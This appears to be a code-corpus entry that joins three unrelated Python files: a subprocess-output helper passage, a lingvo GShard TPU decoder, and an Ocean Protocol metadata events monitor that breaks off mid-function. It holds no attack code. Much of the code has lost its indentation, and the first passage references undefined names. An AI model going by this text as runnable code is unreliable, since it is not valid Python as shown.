"""A Queue.Queue-based implementation of _IterProcessStdout.
TODO(jbudorick): Evaluate whether this is a suitable replacement for
_IterProcessStdoutFcntl on all platforms.
"""
# pylint: disable=unused-argument
import Queue
import threading
stdout_queue = Queue.Queue()
def read_process_stdout():
# TODO(jbudorick): Pick an appropriate read size here.
while True:
try:
output_chunk = os.read(process.stdout.fileno(), buffer_size)
except IOError:
break
stdout_queue.put(output_chunk, True)
if not output_chunk and process.poll() is not None:
break
reader_thread = threading.Thread(target=read_process_stdout)
reader_thread.start()
end_time = (time.time() + timeout) if timeout else None
try:
while True:
if end_time and time.time() > end_time:
raise TimeoutError()
try:
s = stdout_queue.get(True, iter_timeout)
if not s:
break
yield s
except Queue.Empty:
yield None
finally:
try:
if process.returncode is None:
# Make sure the process doesn't stick around if we fail with an
# exception.
process.kill()
except OSError:
pass
process.wait()
reader_thread.join()
_IterProcessStdout = (
_IterProcessStdoutQueue
if sys.platform == 'win32'
else _IterProcessStdoutFcntl)
"""Iterate over a process's stdout.
This is intentionally not public.
Args:
process: The process in question.
iter_timeout: An optional length of time, in seconds, to wait in
between each iteration. If no output is received in the given
time, this generator will yield None.
timeout: An optional length of time, in seconds, during which
the process must finish. If it fails to do so, a TimeoutError
will be raised.
buffer_size: The maximum number of bytes to read (and thus yield) at once.
poll_interval: The length of time to wait in calls to `select.select`.
If iter_timeout is set, the remaining length of time in the iteration
may take precedence.
Raises:
TimeoutError: if timeout is set and the process does not complete.
Yields:
basestrings of data or None.
"""
def GetCmdStatusAndOutputWithTimeout(args, timeout, cwd=None, shell=False,
logfile=None, env=None):
"""Executes a subprocess with a timeout.
Args:
args: List of arguments to the program, the program to execute is the first
element.
timeout: the timeout in seconds or None to wait forever.
cwd: If not None, the subprocess's current directory will be changed to
|cwd| before it's executed.
shell: Whether to execute args as a shell command. Must be True if args
is a string and False if args is a sequence.
logfile: Optional file-like object that will receive output from the
command as it is running.
env: If not None, a mapping that defines environment variables for the
subprocess.
Returns:
The 2-tuple (exit code, output).
Raises:
TimeoutError on timeout.
"""
_ValidateAndLogCommand(args, cwd, shell)
output = StringIO.StringIO()
process = Popen(args, cwd=cwd, shell=shell, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env)
try:
for data in _IterProcessStdout(process, timeout=timeout):
if logfile:
logfile.write(data)
output.write(data)
except TimeoutError:
raise TimeoutError(output.getvalue())
str_output = output.getvalue()
logger.debug('STDOUT+STDERR: %s%s', str_output[:4096].rstrip(),
'<truncated>' if len(str_output) > 4096 else '')
return process.returncode, str_output
def IterCmdOutputLines(args, iter_timeout=None, timeout=None, cwd=None,
shell=False, env=None, check_status=True):
"""Executes a subprocess and continuously yields lines from its output.
Args:
args: List of arguments to the program, the program to execute is the first
element.
iter_timeout: Timeout for each iteration, in seconds.
timeout: Timeout for the entire command, in seconds.
cwd: If not None, the subprocess's current directory will be changed to
|cwd| before it's executed.
shell: Whether to execute args as a shell command. Must be True if args
is a string and False if args is a sequence.
env: If not None, a mapping that defines environment variables for the
subprocess.
check_status: A boolean indicating whether to check the exit status of the
process after all output has been read.
Yields:
The output of the subprocess, line by line.
Raises:
CalledProcessError if check_status is True and the process exited with a
non-zero exit status.
"""
cmd = _ValidateAndLogCommand(args, cwd, shell)
process = Popen(args, cwd=cwd, shell=shell, env=env,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return _IterCmdOutputLines(
process, cmd, iter_timeout=iter_timeout, timeout=timeout,
check_status=check_status)
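# Hedged usage sketch (hypothetical command, not part of the original file):
# lines are yielded as the process produces them, and CalledProcessError is
# raised at the end if check_status is True and the exit status is non-zero.
#   for line in IterCmdOutputLines(['adb', 'logcat', '-d']):
#     if line is None:
#       continue  # only happens when iter_timeout is set
#     logger.info(line)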
def _IterCmdOutputLines(process, cmd, iter_timeout=None, timeout=None,
check_status=True):
buffer_output = ''
iter_end = None
cur_iter_timeout = None
if iter_timeout:
iter_end = time.time() + iter_timeout
cur_iter_timeout = iter_timeout
for data in _IterProcessStdout(process, iter_timeout=cur_iter_timeout,
timeout=timeout):
if iter_timeout:
# Check whether the current iteration has timed out.
cur_iter_timeout = iter_end - time.time()
if data is None or cur_iter_timeout < 0:
yield None
iter_end = time.time() + iter_timeout
continue
else:
assert data is not None, (
'Iteration received no data despite no iter_timeout being set. '
'cmd: %s' % cmd)
# Construct lines to yield from raw data.
buffer_output += data
has_incomplete_line = buffer_output[-1] not in '\r\n'
lines = buffer_output.splitlines()
buffer_output = lines.pop() if has_incomplete_line else ''
for line in lines:
yield line
if iter_timeout:
iter_end = time.time() + iter_timeout
if buffer_output:
yield buffer_output
if check_status and process.returncode:
raise subprocess.CalledProcessError(process.returncode, cmd)
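# The helper above buffers any trailing partial line until the next chunk of
# output arrives. A minimal, self-contained sketch of the same line-splitting
# idiom over an arbitrary iterable of text chunks (_ExampleSplitChunksIntoLines
# is hypothetical and not used elsewhere in this module):
def _ExampleSplitChunksIntoLines(chunks):
  pending = ''
  for chunk in chunks:
    pending += chunk
    if not pending:
      continue
    has_incomplete_line = pending[-1] not in '\r\n'
    lines = pending.splitlines()
    pending = lines.pop() if has_incomplete_line else ''
    for line in lines:
      yield line
  if pending:
    # Emit whatever is left once the stream ends without a final newline.
    yield pending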
|
gshard_decode.py
|
# Lint as: python3
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""GShard decoder class."""
import threading
import time
from lingvo import compat as tf
from lingvo.core import cluster as lingvo_cluster
from lingvo.core import cluster_factory
from lingvo.core import gshard_utils
from lingvo.core import py_utils
from lingvo.core import tpu_summary
import numpy as np
# pylint: disable=g-direct-tensorflow-import
from tensorflow.core.protobuf.tpu import topology_pb2
from tensorflow.python.tpu import device_assignment as tpu_device_assignment
from tensorflow.python.tpu import tpu as tpu_lib
from tensorflow.python.tpu import tpu_feed
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop
from tensorflow.python.tpu.ops import tpu_ops
# pylint: enable=g-direct-tensorflow-import
def preload_zero(n=None, batch_size=None, max_len=None, key_size=2):
"""Returns the same structure as preload_unpacked but with zeros."""
batch = (
# key: (fileno + lineno) in batch mode
# (rpc id + timestamp) in rpc mode
np.zeros([n, batch_size, key_size], np.int32),
# tgt_id
np.zeros([n, batch_size, max_len], np.int32),
# tgt_segment_id
np.zeros([n, batch_size, max_len], np.float32),
# tgt_segment_pos
np.zeros([n, batch_size, max_len], np.int32),
# tgt_labels
np.zeros([n, batch_size, max_len], np.int32),
# tgt_sample_temperature
np.zeros([n, batch_size], np.float32),
)
return batch
def get_zero_batch(batch_size=None,
max_len=None,
key_size=2,
return_tgt_mask=False):
"""Returns zero batch.
Args:
batch_size: batch size.
max_len: max length.
key_size: key size.
    return_tgt_mask: whether to return tgt_mask.
Returns: a tuple of tensors
key: int32 tensor [batch_size, key_size]
tgt_id: int32 tensor [batch_size, max_len]
tgt_segment_id: float32 tensor [batch_size, max_len]
tgt_segment_pos: int32 tensor [batch_size, max_len]
tgt_labels: int32 tensor [batch_size, max_len]
tgt_sample_temperature: float32 tensor [batch_size]
tgt_mask: optional float32 tensor [batch_size, max_len, max_len]
"""
batch = preload_zero(
n=1, batch_size=batch_size, max_len=max_len, key_size=key_size)
batch = py_utils.Transform(lambda x: np.squeeze(x, 0), batch)
if return_tgt_mask:
tgt_mask = np.zeros([batch_size, max_len, max_len], np.float32)
batch = (*batch, tgt_mask)
return batch
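# Illustrative usage sketch: the shapes of the tuple returned by
# get_zero_batch() follow the docstring above. batch_size=2, max_len=4 and
# _example_zero_batch_shapes are arbitrary, hypothetical examples.
def _example_zero_batch_shapes():
  key, tgt_id, tgt_segment_id, tgt_segment_pos, tgt_labels, tgt_temp = (
      get_zero_batch(batch_size=2, max_len=4))
  assert key.shape == (2, 2)  # [batch_size, key_size]
  assert tgt_id.shape == (2, 4)  # [batch_size, max_len]
  assert tgt_segment_id.dtype == np.float32
  assert tgt_temp.shape == (2,)  # [batch_size]
  return (key, tgt_id, tgt_segment_id, tgt_segment_pos, tgt_labels, tgt_temp)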
# mimic training_loop.repeat(), but make it repeat forever.
def infinite_repeat(body_fn, infeed_queue):
"""Builds infinite loop.
Args:
body_fn: a Python function that builds the loop body.
infeed_queue: if not None, the infeed queue from which to append a tuple of
arguments as inputs to condition.
Returns:
The final values of the loop-carried tensors.
"""
def to_list(x):
if isinstance(x, (list, tuple)):
return list(x)
else:
return [x]
def body_fn_wrapper(i, *args):
return [i + 1] + to_list(body_fn(*args))
outputs = training_loop.while_loop(
lambda i, *args: tf.constant(True), # infinite loop
body_fn_wrapper,
inputs=[0],
infeed_queue=infeed_queue)
outputs = to_list(outputs)
if len(outputs) == 1:
# Returns the Op rather than an empty list.
return outputs[0].op
else:
return outputs[1:]
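# The wrapper above threads a hidden iteration counter through the loop carry
# while keeping body_fn unaware of it. A rough, CPU-only analogy of the same
# bookkeeping for a fixed number of steps, assuming body_fn returns a sequence
# (_example_counted_repeat is hypothetical and not used by the decoder):
def _example_counted_repeat(body_fn, initial_args, steps):
  carry = [0] + list(initial_args)
  for _ in range(steps):
    i, args = carry[0], carry[1:]
    carry = [i + 1] + list(body_fn(*args))
  return carry[1:]  # drop the counter, mirroring `outputs[1:]` above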
def daemon(closure):
"""Runs the closure in a background thread."""
thread = threading.Thread(target=closure)
thread.daemon = True
thread.start()
return thread
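# Illustrative usage sketch: daemon() is used further below to overlap slow
# work (e.g. a checkpoint restore) with other setup. The Event-based closure
# here is only a toy example; _example_daemon_usage is hypothetical.
def _example_daemon_usage():
  done = threading.Event()
  thread = daemon(done.set)  # returns immediately; the closure runs in background
  done.wait(timeout=5)  # the caller may keep working or block as needed
  return thread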
class GShardDecode:
"""Base decoder class.
Implements the main computation loop.
Attrs:
    tpu: name or address of the tpu node.
worker_job_name: job name of tpu.
prefix_max_len: Length of prefix.
cluster_params: cluster params.
cluster: cluster object.
    graph: a tf.Graph() in which ops are built.
task: the task object.
compile_op: tpu program compile op.
init_vars_op: op to init vars randomly.
infeed_op: the tf op to infeed data.
infeed_args: a list of placeholder nodes.
outfeed_op: the tf op to poll outfeed.
    outfeed: a list of outfeed tensors, used as a structure reference.
decode_loop: the op to start decode loop.
saver: tf.train.Saver object.
num_batches: num of decode steps to run. If None, run infinitely.
    spm: a SentencePieceModel object.
"""
def __init__(self, tpu=None, worker_job_name=None, prefix_max_len=128):
self._tpu = tpu
self._worker_job = worker_job_name
self._prefix_max_len = prefix_max_len
self._c = threading.Condition() # lock
# set in reset_session
self._sess = None
# set in configure_cluster_params
self.cluster_params = None
# set in init_graph
self.cluster = None
self.graph = tf.Graph()
self.task = None
self.compile_op = None
self.init_vars_op = None
self.infeed_op = None
self.infeed_args = None
self.outfeed_op = None
self.outfeed = None
self.decode_loop = None
self.saver = None
self.num_batches = None
self._heartbeat = False
self._saver_reshape = True
# set in load_spm
self.spm = None
def load_spm(self, spm):
self.spm = gshard_utils.LoadSpm(spm)
def reset_tpu_cluster(self):
tf.logging.info('Connecting to tpu %s', self._tpu)
with tf.container('') as container:
# Kills all sessions on this cluster.
tf.Session.reset(
target=self._tpu,
containers=[container],
config=self._no_opt_sess_cfg())
def get_session(self):
self._c.acquire()
while not self._sess:
tf.logging.info('Waiting for session to be setup ...')
self._c.wait()
sess = self._sess
self._c.release()
return sess
def _no_opt_sess_cfg(self):
# Disable constant folding for convenience.
return tf.config_pb2.ConfigProto(
graph_options=tf.GraphOptions(
optimizer_options=tf.OptimizerOptions(
opt_level=tf.OptimizerOptions.L0,
do_common_subexpression_elimination=False,
do_function_inlining=False,
do_constant_folding=False)))
def reset_session(self, target):
"""Resets session on target worker with current graph."""
self._c.acquire()
if self._sess is not None:
try:
self._sess.close()
except tf.errors.AbortedError as e:
# It's ok if the session is already aborted.
tf.logging.error('Exception %s', str(e))
pass
tf.logging.info('Creating new session ...')
self._sess = tf.Session(
target=target, graph=self.graph, config=self._no_opt_sess_cfg())
tf.logging.info('Done creating new session.')
self._c.notify()
self._c.release()
return self._sess
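  # get_session() and reset_session() above form a condition-variable handshake:
  # readers block on self._c until a writer publishes the session and notifies.
  # A rough sketch of the same pattern in isolation, with a plain value standing
  # in for the tf.Session (the _Holder class is hypothetical):
  #
  #   class _Holder:
  #     def __init__(self):
  #       self._cond = threading.Condition()
  #       self._value = None
  #
  #     def get(self):
  #       with self._cond:
  #         while self._value is None:
  #           self._cond.wait()
  #         return self._value
  #
  #     def set(self, value):
  #       with self._cond:
  #         self._value = value
  #         self._cond.notify_all()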
def run_init_sequence(self):
"""Runs init sequences before decoding."""
assert self.init_vars_op is not None
assert self.compile_op is not None
sess = self.reset_session(self._tpu)
if self._heartbeat:
self._start_heartbeat()
if self.ckpt:
def run_restore():
tf.logging.info('Restoring vars from ckpt: start')
try:
self.saver.restore(sess, self.ckpt)
except Exception as e:
tf.logging.fatal('Restoring vars exception: %r %s', e, e)
raise
tf.logging.info('Restoring vars from ckpt: done')
init_thread = daemon(run_restore)
else:
def run_init():
tf.logging.info('Init vars randomly: start')
try:
sess.run(self.init_vars_op)
except Exception as e:
tf.logging.fatal('Init vars exception: %r %s', e, e)
raise
tf.logging.info('Init vars randomly: done')
init_thread = daemon(run_init)
if hasattr(self.task, 'input'):
tf.logging.info('Init data')
self.task.input.Initialize(sess)
tf.logging.info('Init data done')
tf.logging.info('Compile: start')
run_options = tf.RunOptions(timeout_in_ms=86400 * 1000)
sess.run(self.compile_op, options=run_options)
tf.logging.info('Compile: done')
init_thread.join()
def _configure_cluster_params(self, tpu_cores=None, cpu_hosts=None):
"""Initialize cluster params."""
tf.logging.info(cpu_hosts)
cluster_factory.SetCluster(lingvo_cluster._Cluster) # pylint: disable=protected-access
cluster_params = cluster_factory.Cluster.Params()
cluster_params.mode = 'sync'
cluster_params.job = 'trainer_client'
cluster_params.do_eval = True # turn off dropout
cluster_params.worker.name = self._worker_job
cluster_params.worker.tpus_per_replica = tpu_cores
cluster_params.worker.devices_per_split = tpu_cores
cluster_params.worker.num_tpu_hosts = cpu_hosts
cluster_params.ps.name = self._worker_job
cluster_params.ps.replicas = cpu_hosts
return cluster_params
def _start_heartbeat(self):
"""Start the heartbeat."""
def run_heartbeat_loop():
count = 0
# Set a timeout of 30 seconds for each heartbeat.
run_options = tf.RunOptions(timeout_in_ms=30 * 1000)
while True:
try:
if count % 100 == 0:
tf.logging.info('heartbeat: request_%d ...', count)
t_begin = time.time()
sess = self.get_session()
ret = sess.run(self.heartbeat, options=run_options)
if self.streamz_heartbeat_latency is not None:
self.streamz_heartbeat_latency.Record((time.time() - t_begin) * 1e3)
if count % 100 == 0:
tf.logging.info('heartbeat: done request_%d ... %s', count, ret)
except Exception as e:
tf.logging.fatal('Exception in heartbeat loop thread: %r %s', e, e)
raise
count += 1
# Once every 10 seconds.
time.sleep(10)
daemon(run_heartbeat_loop)
def _config_infeed(self,
num_partitions,
device_assignment,
batch_size,
key_size=2,
return_tgt_mask=False,
use_partitioned_infeed_queue=False):
"""Config the infeed ops and args."""
zero_batch = get_zero_batch(
batch_size=batch_size,
max_len=self._prefix_max_len,
key_size=key_size,
return_tgt_mask=return_tgt_mask)
host_device = device_assignment.host_device(replica=0, job=self._tpu)
host_id = int(host_device.split('/task:')[1].split('/device:')[0])
input_partition_dims = [
[num_partitions] + [1] * (len(x.shape) - 1) for x in zero_batch
]
if use_partitioned_infeed_queue:
infeed = tpu_feed._PartitionedInfeedQueue( # pylint: disable=protected-access
number_of_tuple_elements=len(zero_batch),
host_id=host_id,
input_partition_dims=input_partition_dims,
device_assignment=device_assignment)
else:
infeed = tpu_feed.InfeedQueue(number_of_tuple_elements=len(zero_batch))
self.infeed_args = []
for x in zero_batch:
p = tf.placeholder(tf.as_dtype(x.dtype), shape=x.shape)
self.infeed_args += [p]
if use_partitioned_infeed_queue:
self.infeed_op = infeed.generate_enqueue_ops([self.infeed_args])
else:
self.infeed_op = infeed.split_inputs_and_generate_enqueue_ops(
self.infeed_args, device_assignment=device_assignment)
return infeed
def _init_tpu(self, num_partitions, device_order_mode):
"""Initialize tpu device assignment."""
tf.logging.info('Initializing TPU to get device assignment: start')
graph = tf.Graph()
with graph.as_default():
init_tpu_op = tf.tpu.initialize_system()
try:
sess = tf.Session(target=self._tpu, graph=graph)
topology = sess.run(init_tpu_op)
except Exception as e:
tf.logging.fatal('TPU initialization failed: %s', e)
raise
topology_proto = topology_pb2.TopologyProto()
topology_proto.ParseFromString(topology)
tf.logging.info('topology.num_tasks: %r', topology_proto.num_tasks)
tf.logging.info('topology.num_tpu_devices_per_task: %r',
topology_proto.num_tpu_devices_per_task)
tf.logging.info('topology.mesh_shape: %r', topology_proto.mesh_shape)
self.cluster_params = self._configure_cluster_params(
tpu_cores=(topology_proto.num_tpu_devices_per_task *
topology_proto.num_tasks),
cpu_hosts=topology_proto.num_tasks)
    # We assume the topology and device assignment do not change
    # for a single address space.
device_assignment = tpu_device_assignment.device_assignment(
topology,
computation_shape=py_utils.ComputationShape(num_partitions, topology),
num_replicas=1,
device_order_mode=device_order_mode)
py_utils.SetTpuDeviceAssignment(device_assignment)
tf.logging.info('Initializing TPU to get device assignment: done')
def init_graph(self, model_params):
"""Builds moe decode graph.
Args:
model_params: the hyperparams of the specified model.
"""
assert self.graph
self.model_params = model_params
batch_size = model_params.task.batch_size
if (hasattr(model_params.task.builder, 'device_mesh_shape') and
model_params.task.builder.device_mesh_shape):
num_partitions = np.prod(model_params.task.builder.device_mesh_shape)
else:
num_partitions = model_params.task.builder.num_devices
device_order_mode = (
model_params.task.train.tpu_device_order_mode or
tpu_device_assignment.DeviceOrderMode.AUTO)
self._init_tpu(num_partitions, device_order_mode)
assert self.cluster_params # configured by init_tpu
self.cluster = self.cluster_params.Instantiate()
with self.graph.as_default(), self.cluster, tf.device(
self.cluster.GetPlacer()):
_ = py_utils.GetOrCreateGlobalStepVar()
self.heartbeat = tf.constant(np.pi)
device_assignment = py_utils.GetTpuDeviceAssignment()
tf.logging.info('Instantiating model')
model = model_params.Instantiate()
xformer = model.GetTask()
self.task = xformer
self.init_vars_op = tf.global_variables_initializer()
self.saver = tf.train.Saver(sharded=True, reshape=self._saver_reshape)
infeed = self._config_infeed(
num_partitions=num_partitions,
device_assignment=device_assignment,
batch_size=batch_size)
self.outfeed = []
def decode_fn(*infeed_batch): # pylint: disable=missing-docstring
# Length 6 is passed when there is no tgt_mask (e.g. decoding) and
# length 7 is passed when there is a tgt_mask (e.g. fprop).
self.outfeed = self._config_outfeed(xformer, infeed_batch)
with tf.device(tf.tpu.core(0)):
outfeed_op = tpu_ops.outfeed_enqueue_tuple(
tf.nest.flatten(self.outfeed))
return [outfeed_op]
@tpu_function.on_device_training_loop
def decode_loop_fn():
if not self.num_batches:
infinite_repeat(decode_fn, infeed)
else:
training_loop.repeat(self.num_batches, decode_fn, infeed_queue=infeed)
self.compile_op, self.decode_loop = tpu_lib.split_compile_and_shard(
decode_loop_fn, num_shards=1, device_assignment=device_assignment)
assert self.outfeed
with tf.device(device_assignment.tpu_device(0, 0)):
self.outfeed_op = tpu_ops.outfeed_dequeue_tuple(
dtypes=[x.dtype for x in tf.nest.flatten(self.outfeed)],
shapes=[x.shape for x in tf.nest.flatten(self.outfeed)])
def _config_outfeed(self, xformer, infeed_batch):
"""Setup the outfeed ops."""
fprop_dtype = py_utils.FPropDtype(self.model_params.task)
assert len(infeed_batch) == 6 or len(infeed_batch) == 7, len(infeed_batch)
if len(infeed_batch) == 7:
(key, tgt_ids, tgt_segment_id, tgt_segment_pos, tgt_labels, _,
_) = infeed_batch
elif len(infeed_batch) == 6:
(key, tgt_ids, tgt_segment_id, tgt_segment_pos, tgt_labels,
_) = infeed_batch
tgt_segment_id = tf.cast(tgt_segment_id, fprop_dtype)
input_batch = py_utils.NestedMap()
input_batch.src = py_utils.NestedMap()
input_batch.src.ids = (0 * tgt_ids) # unused
input_batch.src.segment_ids = (0 * tgt_segment_id) # unused
input_batch.src.segment_pos = (0 * tgt_segment_pos) # unused
input_batch.tgt = py_utils.NestedMap()
input_batch.tgt.ids = tgt_ids
input_batch.tgt.segment_ids = tgt_segment_id
input_batch.tgt.segment_pos = tgt_segment_pos
input_batch.tgt.labels = tgt_labels # only used when --fprop=true
with tpu_summary.context(rewrite_while_loop=True):
dec_ret = xformer.DecodeIds(xformer.theta, input_batch)
dec_metrics = tpu_summary.merge_all()
key = infeed_batch[0]
return [
key, tgt_ids, tgt_segment_id, dec_ret.topk_ids, dec_ret.topk_lens,
dec_ret.topk_scores, dec_metrics
]
|
events_monitor.py
|
# Copyright 2020 Ocean Protocol Foundation
# SPDX-License-Identifier: Apache-2.0
import logging
import os
import time
import lzma as Lzma
import json
from json import JSONDecodeError
from threading import Thread
from datetime import datetime
import elasticsearch
import requests
from eth_utils import remove_0x_prefix, add_0x_prefix
from ocean_lib.config_provider import ConfigProvider
from eth_account import Account
import eth_keys
import ecies
from oceandb_driver_interface import OceanDb
from aquarius.app.util import (
get_metadata_from_services,
list_errors,
validate_data,
init_new_ddo,
format_timestamp,
DATETIME_FORMAT,
)
from aquarius.app.auth_util import compare_eth_addresses, sanitize_addresses
from plecos.plecos import is_valid_dict_remote, list_errors_dict_remote
from aquarius.events.constants import EVENT_METADATA_CREATED, EVENT_METADATA_UPDATED
from aquarius.events.metadata_updater import MetadataUpdater
from aquarius.events.util import get_metadata_contract, get_datatoken_info
logger = logging.getLogger(__name__)
debug_log = logger.debug
class EventsMonitor:
"""Detect on-chain published Metadata and cache it in the database for
fast retrieval and searchability.
The published metadata is extracted from the `MetadataCreated`
    event log of the `Metadata` smart contract. Metadata updates are also detected using
    the `MetadataUpdated` event.
    The Metadata json object is expected to be in an `lzma` compressed form. If desired,
    the metadata can also be encrypted for specific use cases. When using encrypted
    Metadata, the EventsMonitor requires the private key of the ethereum account that is
    used for encryption. This can be specified in the `EVENTS_ECIES_PRIVATE_KEY` envvar.
    The events monitor pauses between update cycles; the pause defaults to 10 seconds and
    can be lengthened via the `OCN_EVENTS_MONITOR_QUITE_TIME` envvar.
The cached Metadata can be restricted to only those published by specific ethereum accounts.
To do this set the `ALLOWED_PUBLISHERS` envvar to the list of ethereum addresses of known publishers.
"""
_instance = None
def __init__(self, web3, config_file, metadata_contract=None):
self._oceandb = OceanDb(config_file).plugin
self._other_db_index = f"{self._oceandb.driver.db_index}_plus"
self._oceandb.driver.es.indices.create(index=self._other_db_index, ignore=400)
self._web3 = web3
self._pool_monitor = None
if bool(int(os.getenv("PROCESS_POOL_EVENTS", 1)) == 1):
self._pool_monitor = MetadataUpdater(
self._oceandb,
self._other_db_index,
self._web3,
ConfigProvider.get_config(),
)
if not metadata_contract:
metadata_contract = get_metadata_contract(self._web3)
self._contract = metadata_contract
self._contract_address = self._contract.address
self._ecies_private_key = os.getenv("EVENTS_ECIES_PRIVATE_KEY", "")
self._ecies_account = None
if self._ecies_private_key:
self._ecies_account = Account.privateKeyToAccount(self._ecies_private_key)
metadata_block = int(os.getenv("METADATA_CONTRACT_BLOCK", 0))
try:
self.get_last_processed_block()
except Exception:
self.store_last_processed_block(metadata_block)
allowed_publishers = set()
try:
publishers_str = os.getenv("ALLOWED_PUBLISHERS", "")
allowed_publishers = (
set(json.loads(publishers_str)) if publishers_str else set()
)
except (JSONDecodeError, TypeError, Exception) as e:
logger.error(
f"Reading list of allowed publishers failed: {e}\n"
                f'ALLOWED_PUBLISHERS is set to "{os.getenv("ALLOWED_PUBLISHERS")}"'
)
self._allowed_publishers = set(sanitize_addresses(allowed_publishers))
logger.debug(f"allowed publishers: {self._allowed_publishers}")
logger.debug(
f"EventsMonitor: using Metadata contract address {self._contract_address}."
)
self._monitor_is_on = False
default_sleep_time = 10
try:
self._monitor_sleep_time = int(
os.getenv("OCN_EVENTS_MONITOR_QUITE_TIME", default_sleep_time)
)
except ValueError:
self._monitor_sleep_time = default_sleep_time
self._monitor_sleep_time = max(self._monitor_sleep_time, default_sleep_time)
if not self._contract or not self._web3.isAddress(self._contract_address):
logger.error(
f"Contract address {self._contract_address} is not a valid address. Events thread not starting"
)
self._contract = None
self._purgatory_enabled = bool(int(os.getenv("PROCESS_PURGATORY", 1)) == 1)
self._purgatory_list = set()
self._purgatory_update_time = None
@property
def is_monitor_running(self):
return self._monitor_is_on
def start_events_monitor(self):
if self._monitor_is_on:
return
if self._contract_address is None:
logger.error("Cannot start events monitor without a valid contract address")
return
if self._contract is None:
logger.error("Cannot start events monitor without a valid contract object")
return
logger.info(
f"Starting the events monitor on contract {self._contract_address}."
)
t = Thread(target=self.run_monitor, daemon=True)
self._monitor_is_on = True
t.start()
def stop_monitor(self):
self._monitor_is_on = False
if self._pool_monitor and self._pool_monitor.is_running():
self._pool_monitor.stop()
def run_monitor(self):
first_update = bool(
self._pool_monitor and self._pool_monitor.is_first_update_enabled()
)
if self._purgatory_enabled:
self._update_existing_assets_purgatory_data()
while True:
try:
if not self._monitor_is_on:
return
self.process_current_blocks()
self._process_pool_events(first_update)
first_update = False
if self._purgatory_enabled:
self._update_purgatory_list()
except (KeyError, Exception) as e:
logger.error("Error processing event:")
logger.error(e)
time.sleep(self._monitor_sleep_time)
def _process_pool_events(self, first_update=False):
if not self._pool_monitor:
return
if first_update:
self._pool_monitor.do_update()
self._pool_monitor.process_pool_events()
def _update_existing_assets_purgatory_data(self):
for asset in self._oceandb.list():
did = asset.get("id", None)
if not did or not did.startswith("did:op:"):
continue
purgatory = asset.get("isInPurgatory", "false")
if not isinstance(purgatory, str):
purgatory = "true" if purgatory is True else "false"
asset["isInPurgatory"] = purgatory
if "purgatoryData" in asset:
asset.pop("purgatoryData")
try:
self._oceandb.update(json.dumps(asset), did)
except Exception as e:
logger.warning(f"updating ddo {did} purgatory attribute failed: {e}")
@staticmethod
def _get_reference_purgatory_list():
response = requests.get(
"https://raw.githubusercontent.com/oceanprotocol/list-purgatory/main/list-assets.json"
)
if response.status_code != requests.codes.ok:
return set()
return {(a["did"], a["reason"]) for a in response.json() if a and "did" in a}
def _update_purgatory_list(self):
now = int(datetime.now().timestamp())
if self._purgatory_update_time and (now - self._purgatory_update_time) < 3600:
return
self._purgatory_update_time = now
bad_list = self._get_reference_purgatory_list()
if not bad_list:
return
if self._purgatory_list == bad_list:
return
new_ids = bad_list.difference(self._purgatory_list)
self._purgatory_list = bad_list
for _id, reason in new_ids:
try:
asset = self._oceandb.read(_id)
asset["isInPurgatory"] = "true"
if "purgatoryData" in asset:
asset.pop("purgatoryData")
self._oceandb.update(json.dumps(asset), _id)
except Exception:
pass
def process_current_blocks(self):
try:
last_block = self.get_last_processed_block()
except Exception as e:
debug_log(e)
last_block = 0
current_block = self._web3.eth.blockNumber
if (
not current_block
or not isinstance(current_block, int)
or current_block <= last_block
):
return
from_block = last_block
debug_log(
f"Metadata monitor >>>> from_block:{from_block}, current_block:{current_block} <<<<"
)
for event in self.get_event_logs(
EVENT_METADATA_CREATED, from_block, current_block
):
try:
self.processNewDDO(event)
except Exception as e:
logger.error(
f"Error processing new metadata event: {e}\n" f"event={event}"
)
for event in self.get_event_logs(
EVENT_METADATA_UPDATED, from_block, current_block
):
try:
self.processUpdateDDO(event)
except Exception as e:
logger.error(
f"Error processing update metadata event: {e}\n" f"event={event}"
)
self.store_last_processed_block(current_block)
def get_last_processed_block(self):
last_block_record = self._oceandb.driver.es.get(
index=self._other_db_index, id="events_last_block", doc_type="_doc"
)["_source"]
return last_block_record["last_block"]
def store_last_processed_block(self, block):
record = {"last_block": block}
try:
self._oceandb.driver.es.index(
index=self._other_db_index,
id="events_last_block",
body=record,
doc_type="_doc",
refresh="wait_for",
)["_id"]
except elasticsearch.exceptions.RequestError as e:
logger.error(
f"store_last_processed_block: block={block} type={type(block)}, error={e}"
)
def get_event_logs(self, event_name, from_block, to_block):
def _get_logs(event, _from_block, _to_block):
debug_log(f"get_event_logs ({event_name}, {from_block}, {to_block})..")
_filter = event().createFilter(fromBlock=_from_block, toBlock=_to_block)
return _filter.get_all_entries()
try:
logs = _get_logs(
getattr(self._contract.events, event_name), from_block, to_block
)
return logs
except ValueError as e:
logger.error(
f"get_event_logs ({event_name}, {from_block}, {to_block}) failed: {e}.\n Retrying once more."
)
try:
logs = _get_logs(
getattr(self._contract.events, event_name), from_block, to_block
)
return logs
except ValueError as e:
logger.error(
f"get_event_logs ({event_name}, {from_block}, {to_block}) failed: {e}."
)
def is_publisher_allowed(self, publisher_address):
logger.debug(f"checking allowed publishers: {publisher_address}")
if not self._allowed_publishers:
return True
publisher_address = self._web3.toChecksumAddress(publisher_address)
return publisher_address in self._allowed_publishers
def processNewDDO(self, event):
(
did,
block,
txid,
contract_address,
sender_address,
flags,
rawddo,
timestamp,
) = self.get_event_data(event)
logger.info(
f"Process new DDO, did from event log:{did}, sender:{sender_address}"
)
if not self.is_publisher_allowed(sender_address):
logger.warning(f"Sender {sender_address} is not in ALLOWED_PUBLISHERS.")
return
try:
self._oceandb.read(did)
logger.warning(f"{did} is already registered")
return
except Exception:
pass
logger.info(f"Start processing {EVENT_METADATA_CREATED} event: did={did}")
debug_log(
f"block {block}, contract: {contract_address}, Sender: {sender_address} , txid: {txid}"
)
logger.debug(f"decoding with did {did} and flags {flags}")
data = self.decode_ddo(rawddo, flags)
if data is None:
logger.warning(f"Could not decode ddo using flags {flags}")
return
msg, _ = validate_data(data, f"event {EVENT_METADATA_CREATED}")
if msg:
